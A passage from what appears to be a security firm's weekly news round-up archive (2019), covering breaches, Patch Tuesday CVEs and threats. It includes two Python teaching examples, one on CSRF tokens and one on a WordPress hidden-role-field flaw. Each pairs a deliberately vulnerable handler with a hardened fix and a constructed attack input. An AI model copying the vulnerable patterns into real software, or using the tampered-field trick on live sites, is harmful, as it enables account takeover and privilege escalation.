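To make the CSRF mechanism concrete, here is an added example (our own illustration, not Cisco’s code and not the flaw’s proof of concept) of a hypothetical state-changing web UI handler, first with no CSRF defence and then protected with a per-session synchronizer token derived by HMAC-SHA256 from the session id. The session id, the form fields and the request produced by the attacker’s page are all constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Server-side key (assumption: generated once per deployment and never sent to
# the browser). A fresh random value is fine for this stand-alone example.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Per-session anti-CSRF token, rendered into every form the server serves.
    A page on another origin cannot read it, so it cannot be forged."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted: Optional[str], secret: bytes = SERVER_SECRET) -> bool:
    """Constant-time comparison of the submitted token against the expected one."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), submitted)


def handle_set_config(request: Dict, csrf_protected: bool = True) -> str:
    """Hypothetical handler for a device web UI that changes configuration.
    request = {"session": <session id taken from the cookie>, "form": {...}}.
    csrf_protected=False models a UI with no CSRF defence at all."""
    session = request["session"]
    form = request["form"]
    if csrf_protected and not verify_csrf(session, form.get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    return f"applied: {form['setting']}={form['value']}"


# Constructed scenario: the administrator is logged in, so the browser holds
# the cookie for session "sess-42" and attaches it to any request to the device.
ADMIN_SESSION = "sess-42"

# Request produced by the genuine page: the form carries the rendered token.
LEGIT_REQUEST = {
    "session": ADMIN_SESSION,
    "form": {"setting": "ntp_server", "value": "10.0.0.5",
             "csrf_token": csrf_token(ADMIN_SESSION)},
}

# Request produced by an attacker's page the admin was lured into opening.
# The browser adds the cookie; the attacker has no way to know the token.
FORGED_REQUEST = {
    "session": ADMIN_SESSION,
    "form": {"setting": "ntp_server", "value": "203.0.113.9"},
}

if __name__ == "__main__":
    print(handle_set_config(FORGED_REQUEST, csrf_protected=False))  # unprotected UI
    print(handle_set_config(FORGED_REQUEST))                        # protected UI
    print(handle_set_config(LEGIT_REQUEST))                         # genuine form
```

The forged request carries the victim’s cookie, because the browser attaches it, but not the token, because a cross-origin page cannot read the genuine form; that is the whole difference the check relies on. A SameSite cookie attribute is a useful second layer, not a replacement for the token.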

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #45 – 14th June 2019

By Joshua Hare on 13/6/19

Security Advisory Archives

Microsoft Patch Tuesday – June 19

The months are rolling round fast, meaning it’s update time again. The June Patch Tuesday security updates address a total of 88 vulnerabilities: 17 have been rated Critical and 65 Important. Four have been publicly disclosed, but none have been detected as already exploited in the wild.

MS products covered by these updates are the Windows operating systems, Hyper-V, Azure, the Microsoft Edge and Internet Explorer browsers, Office, the ChakraCore scripting engine, Skype for Business, and Exchange Server.

CVE-2019-0620, CVE-2019-0709 and CVE-2019-0722 cover critical remote code execution vulnerabilities in Hyper-V, Microsoft’s hypervisor, which is available in its Windows operating systems. A malicious application run by an authenticated user on a guest virtual machine can trigger the flaw and execute code on the physical host operating system, because the host fails to properly validate input from the guest.

A memory-handling vulnerability exists in ActiveX Data Objects (ADO) that can result in remote code execution with the privileges of the logged-in user. CVE-2019-0888 can be exploited by convincing the user to visit a crafted website.

Eight of the remaining critical vulnerabilities belong to the ChakraCore scripting engine used by the Microsoft Edge and Internet Explorer browsers. Each relates to how objects are handled in memory and, if exploited, gives the attacker the same privileges as the current user. If that user has admin rights, the attacker could gain complete control of the target system.

An Important spoofing vulnerability has been identified in Azure DevOps Server. CVE-2019-0996 is a cross-site request forgery flaw caused by improper handling of application authorisation requests: an attacker who convinces a user to click a malicious link on a crafted page can bypass the OAuth authorisation step and register applications in Azure DevOps.

Please review this month’s updates and get patching as soon as you can!

Keeping up to date with security patches for your operating systems and software is a critical part of delivering and maintaining a strong security posture. Please ensure you test and update as quickly as possible to reduce risk, prevent exploitation and ultimately stay secure.

On a final note if you somehow missed out patching the May 2019 updates, please do get patching straight away, as it is vital everyone is protected against the CVE-2019-0708 critical RDP vuln, that could be the next WannaCry.

For a full list of this month’s updates please see the links below:

Patch Tuesday release notes: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/253dc509-9a5b-e911-a98e-000d3a33c573

Security update guide: https://portal.msrc.microsoft.com/en-us/security-guidance

By Stuart Hare on 12/6/19

Cyber Round-up

Cyber Round-up for 7th June

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

NSA warns Microsoft Windows users of cyber-attack risk

The RDP issue known as ‘BlueKeep’, which has been rolling in security news for the past four weeks, is now firmly on the radar of government security services, after the NSA warned Microsoft Windows users to ensure their systems are updated. BlueKeep allows unauthenticated access to MS Remote Desktop Services, and there is significant concern that it could become the next WannaCry. Both Microsoft and the NSA are urging users to patch their systems as soon as possible to prevent cyber-attacks that could result in complete system compromise.

By BBC.co.uk.

Radisson Rewards may have leaked your data… again

Radisson Rewards have contacted their members again, after inadvertently sending emails containing account information to the wrong members. Rewards members in Europe, the Middle East and Africa had their personal information exposed in the leak, which included names, reward member numbers and balance information. Radisson’s investigation into the issue has confirmed that their network was not compromised, and they are asking members to delete any emails received inadvertently. Not the worst breach seen this year, but another goof nonetheless.

By GrahamCluely.com.

D-Day, 75 years on

Not directly cyber security related, but this topical post from GCHQ provides a brief insight into the early years of security and intelligence. It describes the key role played by the people at Bletchley Park, and the activities that helped turn the tide of World War II.

By GCHQ.gov.uk.

Threats

Free Nations League semi-final sites flood the web but pose ‘huge risk’

The inaugural UEFA Nations League finals started this week, and as fans without Sky subscriptions look for ways to watch the football for free, they are at increased risk of cyber-attack. Fake streaming sites that claim to offer a free live stream of the football are a popular method for cyber criminals to either install malware or scare the user into thinking they have a virus, so they can compromise machines or steal personal and financial information. Be on the lookout for fake sites and domains / URLs with incorrect spelling, and stick to legitimate means of watching the game to stay safe online.

By independent.co.uk.

Threat actors cobble together monstrous Frankenstein campaign

Cisco Talos have identified a string of documents that form a series of cyber attacks they have dubbed the Frankenstein campaign. The campaign combines several open source techniques to build the tools for these targeted attacks, with the aim of infecting victims with malware. Once infected, the system communicates with the attacker’s C2 infrastructure over an encrypted channel, allowing remote interaction with the compromised machine to download further malware payloads, extract data and steal credentials.

Advanced malware protection such as Cisco AMP and secure internet gateways like Cisco Umbrella are great tools to defend against these types of advanced malware.

By Cisco Talos Intelligence - talosintelligence.com.

Vulnerabilities & Updates

Unpatched Bug Let Attackers Bypass Windows Lock Screen On RDP Sessions

Another flaw in the MS Remote Desktop Protocol (RDP) surfaced this week, allowing an attacker to bypass the lock screen. The flaw is triggered when a temporary network disconnect occurs for a locked RDP session: upon reconnection the session is restored unlocked, giving access to the system. Integrated two-factor authentication services are also bypassed by this flaw. The attacker does need physical access to the system that is running the locked RDP session. There is no current patch for this issue and, if reports are correct, Microsoft are not in a hurry to deliver one.

By TheHackerNews.com.

Hackers Can Bypass macOS Security Features

A security researcher has discovered that security features in Apple macOS can be bypassed using code validation issues that allow synthetic clicks. The security prompts generated by the operating system when an application wants to access items such as the camera, microphone, backups and remote-control services can be dismissed with a synthetic click of the OK button, giving malicious actors and applications access to those system components. Apple are aware of the flaw, but it is unclear if or when a fix will be available.

By SecurityWeek.com.

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #44 – 7th June 2019

By Stuart Hare on 6/6/19

Cyber Round-up

Cyber Round-up for 31st May

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

Flipboard Confirms It Was Hacked Twice: 150M Users At Risk As Passwords Stolen

Flipboard, the popular news app, has this week confirmed that it has been hacked twice in the last 12 months. Unauthorised access to its databases resulted in the hacker gaining access to potentially 150 million user account details, which included names, email addresses and salted, hashed passwords. Users of Flipboard will still be able to access the app, but they will be asked to replace their password the next time Flipboard is used, and connections to social media accounts will need to be reset.

By Forbes.

We ain't afraid of no 'ghost user'

GCHQ, the British intelligence arm of the UK government, are in the crosshairs of tech companies over their proposal for a ‘ghost user’ back door into encrypted messaging services. A host of tech giants, including Microsoft and WhatsApp, are against the proposal, citing concerns that it would pose a serious threat to cyber security, privacy and human rights. Dr Ian Levy of the NCSC states that this is the starting point for discussion of a hypothetical proposal that would assist in the fight against global terrorism.

By The Register.

Baltimore ransomware attack

The local government in Baltimore have been suffering for several weeks after being hit by a crippling ransomware attack. Thousands of computers have been infected by the malware, which is reportedly using the NSA’s EternalBlue exploit (previously used by the WannaCry ransomware) that was leaked by the Shadow Brokers group in 2017. There are mixed reports across the industry, though, with some experts suggesting EternalBlue is not involved in spreading the RobbinHood ransomware responsible. If EternalBlue is involved, then it is highly likely that Baltimore’s computer systems had not been patched for some time.

By BBC.

Threats

Phishing Emails Pretend to be Office 365 'File Deletion' Alerts

A new phishing threat has been discovered that pretends to be an alert from Office 365. The alert email warns the victim that an unusual number of files in their account have been deleted and tricks the user into clicking a link to verify the details. A fake Microsoft login page then aims to steal the victim’s Office 365 credentials. The fake page is hosted on MS Azure and uses valid Microsoft certificates, which makes the threat far more convincing.

By Bleeping Computer.

10 years of virtual dynamite: A high-level retrospective of ATM malware

The latest blog from Cisco Talos looks at the increase in ATM cash machine malware over the last 10 years. It gives an overview of the evolution of the malware, explains the differences between skimmer and cash-dispenser types, and covers the numerous families of ATM malware seen in the wild. It concludes with good security practices to secure your ATM devices.

By Cisco Talos Intelligence.

Vulnerabilities & Updates

Convert Plus Plugin Flaw Lets Attackers Become a WordPress Admin

A critical vulnerability has been found in the Convert Plus WordPress plugin that allows malicious actors to create new WordPress admin users through a hidden form field. By intercepting the subscription form request, the actor can change the value of the hidden “cp_set_user” field to administrator and submit the form, creating a new privileged account with full control of the WordPress instance. If you are running the Convert Plus plugin, update to version 3.4.3 to fix this flaw.

By Bleeping Computer.
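The pattern behind this flaw is trusting a hidden form field for something security-relevant. The following is an added example written in Python for illustration; it is not the plugin’s code, and every name other than the “cp_set_user” field is ours. It shows a vulnerable registration handler that reads the role back from the form, beside a hardened version that takes the role from server-side configuration, restricts it with an allowlist so even a misconfigured option cannot hand out administrator, and logs a tampered hidden field. The request body is constructed for the example.

```python
import logging
from typing import Dict

log = logging.getLogger("optin")

DEFAULT_ROLE = "subscriber"
# Roles a public opt-in form may ever create (assumption for this example;
# a real site would load this from its configuration).
PUBLIC_FORM_ROLES = {"subscriber"}


def is_role_allowed(role: str) -> bool:
    """Allowlist check: anything not explicitly listed is refused."""
    return role in PUBLIC_FORM_ROLES


def register_user_vulnerable(form: Dict[str, str]) -> Dict[str, str]:
    """Mirrors the flawed pattern: the role is read back from a hidden form
    field, so whoever submits the form chooses the role."""
    role = form.get("cp_set_user", DEFAULT_ROLE)
    return {"user_login": form["email"], "role": role}


def register_user_hardened(form: Dict[str, str],
                           configured_role: str = DEFAULT_ROLE) -> Dict[str, str]:
    """The role comes from server-side configuration, never from the request,
    and is still checked against the allowlist. A hidden field that disagrees
    with the configured value is a tamper signal worth logging."""
    if not is_role_allowed(configured_role):
        raise ValueError(f"role {configured_role!r} may not be created from a public form")
    submitted = form.get("cp_set_user")
    if submitted is not None and submitted != configured_role:
        log.warning("hidden role field tampered: submitted=%r expected=%r email=%r",
                    submitted, configured_role, form.get("email"))
    return {"user_login": form["email"], "role": configured_role}


# Constructed request body: the attacker intercepted the form and rewrote the
# hidden field before submitting it.
TAMPERED_FORM = {"email": "mallory@example.com", "cp_set_user": "administrator"}

if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print("vulnerable:", register_user_vulnerable(TAMPERED_FORM))
    print("hardened:  ", register_user_hardened(TAMPERED_FORM))
```

The hardened handler does not try to sanitise the client’s value; it simply never uses it. Logging the mismatch gives you a detection signal for people probing the form, which the original plugin would have had no way to raise.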

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #43 – 31st May 2019

By Stuart Hare on 30/5/19

Cyber Round-up

Cyber Round-up for 24th May

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

Data on millions of Instagram accounts spills onto the internet

Researcher Anurag Sen has discovered an unprotected database containing the details of millions of Instagram users. The data was found in a publicly accessible Amazon Web Services S3 storage bucket, managed by marketing company Chtrbox, which could be accessed without a username or password. User profiles and contact information were included in the leak.

By Tripwire.

Legal Threats Make Powerful Phishing Lures

We have seen a huge increase in phishing scams over the past couple of years, and they show no sign of slowing down. Brian Krebs has reported on a recent scam campaign that hit more than 100,000 business email addresses with legal threats. A fake document delivered to the victim carries trojan malware that can in turn deliver additional malicious content such as ransomware. As per our usual guidance, never open email attachments or click on links that are untrusted or that you are not expecting.

By KrebsonSecurity

GozNym Cybercrime gang bought down by US and EU law enforcement

The infamous GozNym gang, who were responsible for stealing approximately 100 million euros from their victims, have been taken down in a joint effort by US and EU law enforcement agencies. The group used advanced banking malware, built from a mix of the Gozi banking trojan and the Nymaim malware, to capture banking credentials and steal funds, before laundering the money through its financial network.

By SCMagazine UK.

Threats

BlackWater campaign associated with MuddyWater Threat Actor

Cisco Talos have identified a recent campaign they have dubbed “BlackWater”, which is suspected of being associated with the known threat actor MuddyWater. New samples discovered use the same method of delivery as previous variants of MuddyWater malware, in the form of macro infected Office documents. They deliver a PowerShell backdoor and bundle new techniques that evade detection. Head over to the Talos blog for another excellent technical write up.

By Cisco Talos Intelligence.

Magecart’s Payment Card Data-Skimming Code Found on Forbes Magazine’s Website

The Magecart threat just keeps rolling on, this time hitting the subscription page on the Forbes Magazine website. Magecart uses malicious javascript to collect credit card and personal information from online checkout pages. But this attack on the Forbes sites show that the Magecart group are not just focused on ecommerce sites.

By Trend Micro

Vulnerabilities & Updates

Mozilla Tackles Two Critical Flaws with Firefox 67 Release

Mozilla have this week released the latest version of the Firefox browser, which aims to provide better speed and greater privacy. Version 67 includes fixes for two critical memory corruption vulnerabilities that allow code execution and could result in a bad actor taking control of the target system. If you are running Firefox, it’s time for an update.

By Threatpost.

Talos releases coverage for 'wormable' Microsoft vulnerability

On the back of the critical RDP vulnerability disclosed by Microsoft in last week’s Patch Tuesday, Cisco Talos have released Snort IDS / IPS rule coverage for CVE-2019-0708. Snort users can now get the update for rule set 2019-05-20, which includes rule 50137 for this vulnerability.

By Cisco Talos Intelligence.

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #42 – 24th May 2019

By Stuart Hare on 23/5/19

Cyber Round-up

Cyber Round-up for 17th May

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

Amazon Hit by an “Extensive” Fraud

Amazon.com have revealed that over the last six months they were hit by an extensive fraud attack that allowed hackers to siphon funds from compromised merchant accounts. Phishing attacks were likely used to gain access to account credentials, but it is unclear how much was actually stolen by the attackers.

By E Hacking News.

Update WhatsApp now! One call could give spies access to your phone

The WhatsApp messaging app has been hit by a flaw that allows bad actors to install silent spyware on a victim’s smartphone simply by making a single call. Although the spyware was targeting a small percentage of the 1.5 billion users, all iOS, Android and Windows mobile device platforms appear to be vulnerable. Get updating your WhatsApp now!

By Naked Security

Huawei poses security threat to UK

The Huawei saga keeps rolling on, with a former MI6 chief urging the UK Government to reconsider their decision to use Huawei in the new 5G mobile network. Although Huawei state they have never participated in Chinese state espionage, the former MI6 chief says they are ‘unable to operate free of the control of the Chinese Government’.

By The Guardian.

Threats

Prevent a worm by updating Remote Desktop Services (CVE-2019-0708)

This month’s Microsoft Patch Tuesday disclosed a critical vulnerability in the Remote Desktop Services feature that can be exploited without valid login details. Older operating systems such as Windows 7 and Server 2008 are vulnerable. Microsoft must be concerned about this threat, as they even provided updates for the no longer supported Windows XP and Server 2003. Get patching your servers now and, if you have internet-accessible RDP servers, get them secured ASAP.

By Microsoft Technet.

Intel CPUs Impacted By New Class of Spectre-Like Attacks

A new Spectre-like set of side-channel attacks has been identified in Intel CPUs, with the potential to leak sensitive data. Four separate attack vectors (ZombieLoad, Fallout, RIDL and Store-to-Leak) are associated with this threat, and they can leak information such as user keys, disk encryption keys and passwords from CPU buffers. Intel is releasing microcode updates, in conjunction with vendor updates from Red Hat, Oracle and Microsoft, to mitigate the threat.

By Threat Post

Vulnerabilities & Updates

Microsoft Patch Tuesday – May 19

Microsoft has released its regular monthly security updates, which cover a total of 79 vulnerabilities. 22 have been rated Critical and 55 Important; 2 have been publicly disclosed and 1 has been detected as already being exploited in the wild. This month includes a critical vulnerability in Remote Desktop Services that needs immediate attention.

By Ironshare.

Latest security updates from Apple

Apple have released their latest set of product security updates. iOS and tvOS are updated to v12.3, macOS updates are available for Sierra, High Sierra and Mojave, while watchOS is updated to v5.2.1. iOS alone covers a total of 42 vulnerabilities, half of them in WebKit, which can lead to code execution. Check all your devices and get updating.

By Apple Support

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #41 – 17th May 2019

By Stuart Hare on 16/5/19

Security Advisory Archives

Microsoft Patch Tuesday – May 19

Microsoft has released its regular monthly security updates, which cover a total of 79 vulnerabilities. 22 have been rated Critical and 55 Important; 2 have been publicly disclosed and 1 has been detected as already being exploited in the wild.

MS products covered by these updates are the Windows operating systems, the Edge and Internet Explorer browsers, Office, SQL Server, GDI+, Team Foundation Server, Skype, the .NET Framework and the ever-present ChakraCore scripting engine.

The highest rated vulnerability this month is CVE-2019-0708, with a CVSS score of 9.8. This remote code execution flaw affects Remote Desktop Services (the remote administration protocol) and requires neither authentication nor user interaction to exploit. An attacker can exploit it by sending a crafted RDP request to the target system, allowing them to change or delete data, install applications and create new privileged accounts.

Microsoft browsers have updates resolving 3 Critical CVEs related to memory corruption vulnerabilities in the scripting engine; these make a regular appearance in Patch Tuesday and are caused by the way objects are handled in memory.

By exploiting these flaws through a user accessing a specially crafted web page or embedded ActiveX control, an attacker could execute code as the currently logged-in user. If the user was logged in with admin rights, the attacker could take control of the target system and install programs, as well as steal, change or delete data.

CVE-2019-0903 covers a critical remote code execution vulnerability in GDI+, the Windows Graphics Device Interface. Due to improper handling of objects in memory, an attacker can take control of the target machine. This can be exploited through a file-sharing attack that uses a malicious document, or a web-based attack using a specially crafted web site.

The vulnerability seen exploited in the wild is an Important privilege elevation flaw in Windows Error Reporting (CVE-2019-0863), affecting all supported versions of the Windows operating system. It can be exploited by a bad actor who first gains unprivileged access to the target system; privileges can then be elevated to administrator level, allowing the actor to execute code, manipulate and delete data, and create new backdoor accounts with admin rights.

Please review this month’s updates and get patching as soon as you can!

Keeping up to date with security patches for your operating systems and software is a critical part of delivering and maintaining a strong security posture. Please ensure you test and update as quickly as possible to reduce risk, prevent exploitation and ultimately stay secure.

For a full list of this month’s updates please see the links below:

Patch Tuesday release notes: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/e5989c8b-7046-e911-a98e-000d3a33a34d

Security update guide: https://portal.msrc.microsoft.com/en-us/security-guidance

By Stuart Hare on 14/5/19

Cyber Round-up

Cyber Round-up for 10th May

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

Action Fraud report reveals £7 million lost to holiday fraud

Action Fraud, the UK’s national reporting centre for fraud and cyber crime, run by the City of London Police, has reported that holiday fraud saw a significant increase in 2018 compared to 2017. Take a look at their post to understand the risk and get tips on how to stay safe online. With over 5,000 people losing more than £7 million last year, can you afford to be the next victim?

By Action Fraud.

Sensitive Data Can Lurk on Second-hand Hard Drives

Data recovery experts have discovered that an alarming number of second-hand hard disk drives, that are believed to have been securely wiped, still contain sensitive data. The drives were purchased on eBay and were found to include personally identifiable information, corporate data and a large number of emails.

By Bitdefender.

A hacker is wiping Git repositories and asking for a ransom

At least 390 Git code repositories, hosted on GitHub and other services, have been targeted by a hacker who is removing the source code and demanding a ransom to recover it. A ransom note is left behind stating that 0.1 Bitcoin should be sent to the attacker to regain access to the code. Weak passwords and Git config files containing access credentials are thought to be the cause.

By ZDNet

Threats

Dharma Ransomware Uses Legit Antivirus Tool To Distract Victims

A new variant of the Dharma ransomware masquerades as the ESET AV Remover to distract its victims while it encrypts their files in the background. A phishing email is used for the initial infection: it convinces the user there is an issue with their PC and recommends downloading and running a malicious Defender.exe attachment, which results in the user’s data becoming unusable.

By Bleeping Computer.

Compromised Office 365 Accounts Used to Send 1.5 Million Email Threats in March

During March, Barracuda Networks identified an increase in Office 365 account takeovers, with thousands of accounts compromised. The compromised accounts were then used by the bad actors to send more than 1.5 million malicious spam emails in an effort to acquire more victims. Office 365 accounts continue to be a prime target for hackers, so ensure that your organisation is protected.

By Trend Micro

Vulnerabilities & Updates

Researchers discover very stealthy Microsoft Exchange backdoor

ESET researchers have identified a backdoor in Microsoft Exchange Server that they have named LightNeuron. This malicious Mail Transport Agent can read, modify and block email, as well as compose new emails. The backdoor is actively being used by Russian actors that are likely to be nation-state sponsored.

By HelpNetSecurity.

Latest Android security updates

Google has released its Android security updates for May this week. Patches seem a little light this month, including fixes for 4 critical vulnerabilities, 10 high and 1 moderate. Pixel users can get hold of these updates immediately, while Android smartphones from other vendors may have to wait a while before they are available.

By Sophos – Naked Security

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #40 – 10th May 2019

By Stuart Hare on 10/5/19

Cyber Round-up

Cyber Round-up for 3rd May

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

Hackers went undetected in Citrix’s internal network for six months

After gaining access to Citrix’s network, hackers remained active on their systems for six months before they were detected. Data was exfiltrated, possibly including employee information.

By TechCrunch.

Sacked defence secretary denies security council leak

Last week we heard that there had been a leak from the UK National Security Council related to the government’s decision to use Huawei in its 5G network. As a result of this leak, former defence secretary Gavin Williamson has been sacked from his position, although he denies leaking the information.

By Sky News.

Japan is developing a computer virus to fight cyberattacks

The Japanese Defence Ministry is considering working with private companies to create a computer virus as a defence mechanism against cyber attacks. To us this doesn’t sound like a great idea. See what you think.

By Hot for Security.

Threats

Sodinokibi ransomware exploits WebLogic Server vulnerability

The recently disclosed Oracle WebLogic vulnerability (CVE-2019-2725) is being actively exploited by the bad guys. By simply accessing the WebLogic server over HTTP, with no authentication, attackers are launching a new ransomware attack called Sodinokibi.

By Cisco Talos.

Magecart Group 12 Targets OpenCart Websites

RiskIQ have identified a large scale Magecart operation that is targeting OpenCart based online stores, placing thousands of shopping platforms at risk of personal and financial information theft.

By Bleeping Computer.

Vulnerabilities & Updates

Cisco issues critical security warning for Nexus Switches

Cisco have released 40 security advisories, which included a critical vulnerability for the Nexus 9000 switches. A bug in SSH key management services can be exploited to allow an attacker to connect to the device with root privileges.

By Network World.

Sky Broadband Routers bricked by firmware update

Sky customers have been complaining after a new firmware update has been breaking their broadband routers. If you are a Sky customer who has changed the default DNS settings, you may need to roll back your router’s firmware.

By The Register.

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #39 – 3rd May 2019

By Stuart Hare on 3/5/19

Cyber Round-up

Cyber Round-up for 26th April

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

  • 3 out of 5 Firms Reported Cyber-Attacks in 2019
  • Hackers Knock The Weather Channel Off-Air
  • UK Decision on Huawei 5G Leaked
  • Facebook Could Face $5 Billion Dollar Fine

3 out of 5 Firms Reported Cyber-Attacks in 2019

The global insurance specialist Hiscox has released its 2019 Cyber Readiness Report, which surveyed 5,400 small, medium and large businesses across seven countries (UK, US, Belgium, France, Germany, Netherlands & Spain) to determine how prepared they are for dealing with cyber-attacks.

As the number and intensity of cyber-attacks continues to rise, 61% of firms confirmed they have reported an attack in the last year, a significant jump up from the 45% in 2018.

In the UK alone reported attacks rose from 40% to 55%.

The report shows that although the Large and Enterprise size companies are still the most likely to be targeted in attacks, the stats highlight that small and medium size firms are quickly catching them up.

Medium size firms of 50-249 employees have seen the biggest jump, rising to 63%, an overall increase of 27% on the previous year, with an average cost of attacks per business sitting at £142k.

Meanwhile, 47% of small firms (1-49 employees) now confirm they have been targeted, with those attacks having an average cost of £11k.

These stats prove that the smaller companies who feel that they won’t be targeted or have nothing of value to cyber criminals, clearly need to adjust their thinking and start taking action.

The introduction of the GDPR in May 2018 has no doubt had a big influence on the rise of reported attacks, especially considering the heavy fines that can follow a breach, if not reported in the mandated 72-hour time frame.

The biggest take away from this report is that although more companies of all sizes have become victims of one or more cyber-attacks, preparation to protect and defend our organisations is still way below where it needs to be.

If you are one of those companies that are yet to establish a cyber security plan, then it’s time to make a start and get cyber ready.

Read the report on Hiscox ….

Hackers Knock The Weather Channel Off-Air

On Thursday 18th April The Weather Channel was unable to air its usual programming for approximately 90 minutes, due to reported technical difficulties.

Normal services were resumed at around 07:30 Eastern time in the US, with weatherman Jim Cantore confirming that they had been the victim of a cyber-attack:

“The Weather Channel, sadly, has been the victim of a malicious software attack today.”

These types of hacks on broadcasting organisations are rare, but as the majority now use IP networks to deliver their content, they are vulnerable to the same types of attacks that target other internet connected companies.

Although information on the attack is very limited, there are thoughts among researchers that this could be a result of a ransomware attack.

The Weather Channel reported via their twitter feed that backup mechanisms were used to restore the service and that the FBI have been engaged to investigate the incident.

Read more on ThreatPost….

UK Decision on Huawei 5G Leaked

This week we heard that the UK’s National Security Council (NSC) had agreed to allow Huawei to assist with the build of Britain’s new 5G mobile data network. After months of discussion on the subject, a decision was made, but serious concerns have now been raised after the agreement to involve Huawei was leaked prematurely by a senior member of the NSC.

The NSC is chaired weekly by the PM and consists of senior cabinet members, who meet to discuss National Security concerns. NSC meetings are protected by the Official Secrets Act, due to the nature of the intelligence that is shared by the likes of GCHQ, MI5 and MI6.

The leak of any information from these meetings is of grave concern to government, and it’s likely to be met with a criminal investigation into its source. This appears to be the first time that a leak of NSC information has been committed since it was established in 2010.

Using Huawei for the 5G network has been a huge debate globally, due to the risk of spying and espionage from a company that is associated with and possibly controlled by the Chinese Government.

This decision casts doubt over the UK’s standing in the Five Eyes intelligence alliance it shares with the US, Canada, Australia and New Zealand. Australia have already banned Huawei from their 5G projects, and the US is now calling for its Five Eyes allies to exclude Huawei.

Read more on BBC ….

Facebook Could Face $5 Billion Dollar Fine

In their 1st quarter earnings report for 2019, Facebook has stated they are setting aside up to $5 Billion to cover the possible fines that may result from the FTC’s investigations into their poor data security and privacy practices.

According to the earnings release Facebook stated:

“We estimate that the range of loss in this matter is $3 billion to $5 billion. The matter remains unresolved, and there can be no assurance as to the timing or the terms of any final outcome.”

In March last year the FTC said it would launch an investigation into their privacy violation dealings with Cambridge Analytica.

Further reports suggest that the SEC, FBI and DoJ are also investigating Facebook, and these fines could stack up quickly if found guilty, with $40,000 per violation.

Read more on ThreatPost ….

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #38 – 26th April 2019

By Stuart Hare on 26/4/19

Cyber Round-up

Cyber Round-up for 19th April

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

  • Easter Attack on Apple iOS
  • EA’s Origin Client Exposes Gamers to Malicious Activity
  • Microsoft-based Email Accounts Compromised
  • Cisco Talos: Sea Turtle DNS Hijacking Campaign
  • Facebook Grabs Email Contacts for 1.5 million Users

Easter Attack on Apple iOS

An unpatched bug in the Google Chrome browser is being exploited by cybercriminals targeting Apple iOS devices. The attack is being spread via a malvertising campaign, which is relying on iOS users being more active with browsing on their Apple devices during the Easter period.

The exploit relies on hijacking browser sessions by redirecting the user to another site, pop-up or landing page. If the user clicks on one of these redirected sites or pages, a malicious payload is downloaded to the device and compromise can occur.

Sandboxing evasion techniques are also used by the exploit, to ensure that these pop-ups are not blocked and that it can bypass the security mechanisms in place to prevent redirections.

According to ThreatPost, although the campaign has only been running for a few days, it is highly active in the US, with activity also witnessed across Europe, leading to a possible impact of half a billion user sessions.

Apparently, this threat is not just isolated to Google Chrome and may also be affecting the Safari browser, but information on this is limited.

Please stay vigilant this Easter Bank Holiday, as hackers take advantage of these extended holiday periods to go undetected.

Be careful what you click, especially when presented with pop-ups and redirects to other sites.

Read more on ThreatPost ….

EA’s Origin Client Exposes Gamers to Malicious Activity

Researchers at Underdog Security have identified a security flaw in Electronic Arts’ Origin gaming client that can allow the bad guys to launch malicious code on the gamer’s computer.

The Origin client app is used to buy and download games from Electronic Arts and is in use by millions of gamers worldwide.

The researchers discovered that the Origin app, running on Windows PCs, could be tricked into running any other app on the victim’s computer. They have provided proof of concept code and video footage that shows the exploit launching the Windows Calculator app.

Their investigation shows that common attacks using PowerShell can be used to compromise a target machine and could result in the download and installation of other malicious code, such as ransomware.

EA have issued a fix for this vulnerability and users are urged to update the client as soon as possible.

Read more on TechCrunch….

Microsoft-based Email Accounts Compromised

Earlier this week Microsoft confirmed they had discovered a breach on their web-based email platforms that has resulted in the compromise of numerous customer email accounts.

Although the number of users impacted is said to be limited, the breach affected multiple services including MSN, Hotmail and Outlook.com, between 1st January 2019 and 28th March 2019.

Enterprise accounts using paid-for services were apparently not impacted by this breach.

The cause of this initial breach was down to one of Microsoft’s support agents having their credentials stolen, which allowed a remote attacker to gain access to customer email accounts.

Upon detection Microsoft notified all users, disabled access to the compromised accounts and put controls in place to prevent the attacker’s access.

